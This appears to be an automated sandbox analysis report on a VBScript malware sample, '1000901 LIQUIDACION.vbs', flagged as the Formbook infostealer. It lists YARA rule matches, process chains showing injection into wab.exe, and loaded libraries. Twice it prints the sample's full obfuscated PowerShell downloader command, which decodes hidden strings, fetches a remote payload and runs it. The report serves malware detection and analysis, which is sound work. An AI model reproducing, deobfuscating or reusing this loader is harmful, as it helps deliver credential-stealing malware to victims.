        Source: Yara matchFile source: 00000011.00000002.2595118145.00000000029E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2593836346.00000000024F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2249433724.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        Source: amsi64_7500.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: amsi32_7728.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: 00000012.00000002.2595491228.0000000002250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000011.00000002.2595044684.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000011.00000002.2595118145.00000000029E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000011.00000002.2593836346.00000000024F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000C.00000002.2249433724.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: Process Memory Space: powershell.exe PID: 7500, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7163
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 7163
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function Herremaend($Sursdt){$monuronsnteranimate=$Sursdt.Length-$Demonland;For($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$Alaskans+=$Sursdt.$Predecreeing.Invoke($monurons, $Demonland);}$Alaskans;}function Surere($Adipometer){. ($Disaffirmative) ($Adipometer);}$Monostichic=Herremaend 'AristMDe.imo SjakzSaks.ikortslSportlOmplaarelai/Hiero5Addit..plgk0T,aum An.ta(ProduWEqui.iGeniznIldebdPa.rao SnitwPickesAlleg ,ersoNI,fanTUdpos drown1Wighe0Abbes.Unser0Snoni;Pri o UtakWAfgifi efugnSkal,6Casto4Benin;R.stb FresxTurbu6Homog4 Radb;Round FurcrrVebogv Matr:Famil1 Aste2 Irre1Hvede. Fa,u0Un,er)Gummi unmutG U.dveT lesc ArabkAdvo,o A.ti/Retor2Bi,le0Taale1Folke0Overs0Mede 1Calch0Parti1H.and FlintFPardoiNondirNonvae EstufD,teno Hus.x Pers/Murbr1Filbe2 lapu1b.udo. Un.e0Straf ';$Apyonin182=Herremaend 'EksprUPapirs,ingeeSucrerSpeci-sk.ttASamvigRevaleAfkvinU armt.ofag ';$Halloffire=Herremaend 'Planoh FedetSponttKo,sip SidesNon,r:Speda/Efter/Friskd Kar,rFacadiQv.nsvSlidbeAl,at.BifalgDiloho Socio ,enogSp.cilUndereGlo i. ,nnac reto AfstmGrept/ PadauOv rgcForsk?dyrebeFascixLuftrp ,isco banfr F idtHuffi=Chattd inusoTelefw NattnAftallTranco.anelaArbejd Send&LeggiiUnbludRecla= Dunj1Filmg3 O sts PellIBlokpDEuropg isanKUn oluTrafi2RedskDBuega7Ol,giiP.icaIPosta6 AposzCa,riR ParkxC,mpoA ond4Macaag SoupGTr,jeYtingsS DecoaIniqusVoitu5Ar,aniAl.rm0,asufm Ulovh eriAAdoptTUdfreB icca ';$Startngles=Herremaend 'Redak>Paraf ';$Disaffirmative=Herremaend 'I ebli Vil,e.npatxAdelo ';$Forfrdiget='Tented';Surere (Herremaend ' UlovSsweepefeerstTandk-AttacCSpillodevionTryk.tSodeneProtenOpsentLaves Dunc - A.prPUnderaSubmytStal,hnondi ProtoTkun.t:H,lvt\ ebusTFircieHusassSpytstVesicuStrogdRecipoSugge. 
VorttHalvfx FejetAutos Strue-UdsagVkunsta CpmmlUdmatuSadl.e flin Hjemm$,aderFThromoLiv or e aafHulnirStanddsennaiArkitgImmigeGlosetRubbe;He er ');Surere (Herremaend 'AlkyliMuddlfAlb i udpi(antiotAvissePleursKbsvatMiddl-Kronip Tanda VipetDu,tthzygne GrandTLiche:Lusk.\GruppTA skieSpindsKantetBajaduPirridHvedeo Gobl.Stra,tSamarxReg st Ultr)Globa{Poly e eostxHillbi SkubtRaadf} Sual;trise ');$Tidsskriftsudvlgelserne = Herremaend 'Shille,lericRisikhKaldeo Tjen L nje%Ki,keaBr.dop LendpBirthdNo.spaRevalt Tiraasnebo% Do,e\AasteMnyst.eFrankd TsaririskikAnnalaWilmam,rfteeLamb nBe,hptR.ttoeSvveflCri,i.VanddDPro,odTopsagDdska Lserf&halss&Udl,s Telefe ,ilccRkv,khpooftoBugse Malth$S are ';Surere (Herremaend 'Gombe$TilbagSpa.kl Sgepo F,rfbPseu,aSkrd.l P.og:Bi,psFFo tirSl wdi KolitFremtuBrinjr DecieMalminTredi=S,pra(Firsic BystmP umpd unde Te,ot/Pallhc Rapg Conta$.retcT,elamiExu.ad .ibesS.othsUnto kPrejursulteiDelphfTarlet UtilsDiscruBo uldKinesvTilkrl Mes,g Dv,geergonlVrc.ssProtoeSomikrHanden DraweBoxfi)Outte ');Surere (Herremaend 'Anstt$ pibogT,lstl Ch,roParrobEutecaOrkidlKan i:UnsocTDrmmeinucl.r,eproe G
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247035C0 NtCreateMutant,LdrInitializeThunk,12_2_247035C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_24702C70
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_24702DF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24704650 NtSuspendThread,12_2_24704650
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24703010 NtOpenDirectoryObject,12_2_24703010
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24703090 NtSetValueKey,12_2_24703090
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24704340 NtSetContextThread,12_2_24704340
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702C60 NtCreateKey,12_2_24702C60
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702C00 NtQueryInformationProcess,12_2_24702C00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702CF0 NtOpenProcess,12_2_24702CF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702CC0 NtQueryVirtualMemory,12_2_24702CC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702CA0 NtQueryInformationToken,12_2_24702CA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24703D70 NtOpenThread,12_2_24703D70
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702D30 NtUnmapViewOfSection,12_2_24702D30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24703D10 NtOpenProcessToken,12_2_24703D10
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702D10 NtMapViewOfSection,12_2_24702D10
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702D00 NtSetInformationFile,12_2_24702D00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702DD0 NtDelayExecution,12_2_24702DD0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702DB0 NtEnumerateKey,12_2_24702DB0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702E30 NtWriteVirtualMemory,12_2_24702E30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702EE0 NtQueueApcThread,12_2_24702EE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702EA0 NtAdjustPrivilegesToken,12_2_24702EA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702E80 NtReadVirtualMemory,12_2_24702E80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702F60 NtCreateProcessEx,12_2_24702F60
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702F30 NtCreateSection,12_2_24702F30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702FE0 NtCreateFile,12_2_24702FE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702FB0 NtResumeThread,12_2_24702FB0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702FA0 NtQuerySection,12_2_24702FA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702F90 NtProtectVirtualMemory,12_2_24702F90
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247039B0 NtGetContextThread,12_2_247039B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702AF0 NtWriteFile,12_2_24702AF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702AD0 NtReadFile,12_2_24702AD0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702AB0 NtWaitForSingleObject,12_2_24702AB0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702B60 NtClose,12_2_24702B60
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702BF0 NtAllocateVirtualMemory,12_2_24702BF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702BE0 NtQueryValueKey,12_2_24702BE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702BA0 NtEnumerateValueKey,12_2_24702BA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702B80 NtQueryInformationFile,12_2_24702B80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 24705130 appears 36 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 24717E54 appears 88 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 2473EA12 appears 80 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 2474F290 appears 103 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 246BB970 appears 266 times
        Source: 1000901 LIQUIDACION.vbsInitial sample: Strings found which are bigger than 50
        Source: amsi64_7500.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: amsi32_7728.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: 00000012.00000002.2595491228.0000000002250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000011.00000002.2595044684.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000011.00000002.2595118145.00000000029E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000011.00000002.2593836346.00000000024F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000C.00000002.2249433724.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: Process Memory Space: powershell.exe PID: 7500, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@23/8@4/4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Medikamentel.Ddg
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_no41w1de.rju.ps1
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1000901 LIQUIDACION.vbs"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7500
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7728
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1000901 LIQUIDACION.vbs"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Medikamentel.Ddg && echo $"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Medikamentel.Ddg && echo $"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeProcess created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"
        Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: C:\Windows\SysWOW64\replace.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function Herremaend($Sursdt){$monuronsnteranimate=$Sursdt.Length-$Demonland;For($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$Alaskans+=$Sursdt.$Predecreeing.Invoke($monurons, $Demonland);}$Alaskans;}function Surere($Adipometer){. ($Disaffirmative) ($Adipometer);}$Monostichic=Herremaend 'AristMDe.imo SjakzSaks.ikortslSportlOmplaarelai/Hiero5Addit..plgk0T,aum An.ta(ProduWEqui.iGeniznIldebdPa.rao SnitwPickesAlleg ,ersoNI,fanTUdpos drown1Wighe0Abbes.Unser0Snoni;Pri o UtakWAfgifi efugnSkal,6Casto4Benin;R.stb FresxTurbu6Homog4 Radb;Round FurcrrVebogv Matr:Famil1 Aste2 Irre1Hvede. Fa,u0Un,er)Gummi unmutG U.dveT lesc ArabkAdvo,o A.ti/Retor2Bi,le0Taale1Folke0Overs0Mede 1Calch0Parti1H.and FlintFPardoiNondirNonvae EstufD,teno Hus.x Pers/Murbr1Filbe2 lapu1b.udo. Un.e0Straf ';$Apyonin182=Herremaend 'EksprUPapirs,ingeeSucrerSpeci-sk.ttASamvigRevaleAfkvinU armt.ofag ';$Halloffire=Herremaend 'Planoh FedetSponttKo,sip SidesNon,r:Speda/Efter/Friskd Kar,rFacadiQv.nsvSlidbeAl,at.BifalgDiloho Socio ,enogSp.cilUndereGlo i. ,nnac reto AfstmGrept/ PadauOv rgcForsk?dyrebeFascixLuftrp ,isco banfr F idtHuffi=Chattd inusoTelefw NattnAftallTranco.anelaArbejd Send&LeggiiUnbludRecla= Dunj1Filmg3 O sts PellIBlokpDEuropg isanKUn oluTrafi2RedskDBuega7Ol,giiP.icaIPosta6 AposzCa,riR ParkxC,mpoA ond4Macaag SoupGTr,jeYtingsS DecoaIniqusVoitu5Ar,aniAl.rm0,asufm Ulovh eriAAdoptTUdfreB icca ';$Startngles=Herremaend 'Redak>Paraf ';$Disaffirmative=Herremaend 'I ebli Vil,e.npatxAdelo ';$Forfrdiget='Tented';Surere (Herremaend ' UlovSsweepefeerstTandk-AttacCSpillodevionTryk.tSodeneProtenOpsentLaves Dunc - A.prPUnderaSubmytStal,hnondi ProtoTkun.t:H,lvt\ ebusTFircieHusassSpytstVesicuStrogdRecipoSugge. 
VorttHalvfx FejetAutos Strue-UdsagVkunsta CpmmlUdmatuSadl.e flin Hjemm$,aderFThromoLiv or e aafHulnirStanddsennaiArkitgImmigeGlosetRubbe;He er ');Surere (Herremaend 'AlkyliMuddlfAlb i udpi(antiotAvissePleursKbsvatMiddl-Kronip Tanda VipetDu,tthzygne GrandTLiche:Lusk.\GruppTA skieSpindsKantetBajaduPirridHvedeo Gobl.Stra,tSamarxReg st Ultr)Globa{Poly e eostxHillbi SkubtRaadf} Sual;trise ');$Tidsskriftsudvlgelserne = Herremaend 'Shille,lericRisikhKaldeo Tjen L nje%Ki,keaBr.dop LendpBirthdNo.spaRevalt Tiraasnebo% Do,e\AasteMnyst.eFrankd TsaririskikAnnalaWilmam,rfteeLamb nBe,hptR.ttoeSvveflCri,i.VanddDPro,odTopsagDdska Lserf&halss&Udl,s Telefe ,ilccRkv,khpooftoBugse Malth$S are ';Surere (Herremaend 'Gombe$TilbagSpa.kl Sgepo F,rfbPseu,aSkrd.l P.og:Bi,psFFo tirSl wdi KolitFremtuBrinjr DecieMalminTredi=S,pra(Firsic BystmP umpd unde Te,ot/Pallhc Rapg Conta$.retcT,elamiExu.ad .ibesS.othsUnto kPrejursulteiDelphfTarlet UtilsDiscruBo uldKinesvTilkrl Mes,g Dv,geergonlVrc.ssProtoeSomikrHanden DraweBoxfi)Outte ');Surere (Herremaend 'Anstt$ pibogT,lstl Ch,roParrobEutecaOrkidlKan i:UnsocTDrmmeinucl.r,eproe GJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Medikamentel.Ddg && echo $"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line]
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Medikamentel.Ddg && echo $"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe Process created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"
        Source: C:\Windows\SysWOW64\replace.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Windows\System32\wscript.exe Section loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mpr.dll, scrrun.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, iphlpapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll, fwpuclnt.dll, rasadhlp.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll
        Source: C:\Windows\SysWOW64\replace.exe Section loaded: ulib.dll, wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe Section loaded: wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, fwpuclnt.dll, rasadhlp.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll, cryptdlg.dll, msoert2.dll, msimg32.dll, wininet.dll, sspicli.dll, cryptui.dll, msasn1.dll, msftedit.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, profapi.dll, propsys.dll, edputil.dll, apphelp.dll, explorerframe.dll, sxs.dll, actxprxy.dll, wintypes.dll, windows.staterepositoryps.dll, iertutil.dll
        Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
        Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\msftedit.dll
        Source: Window Recorder Window detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
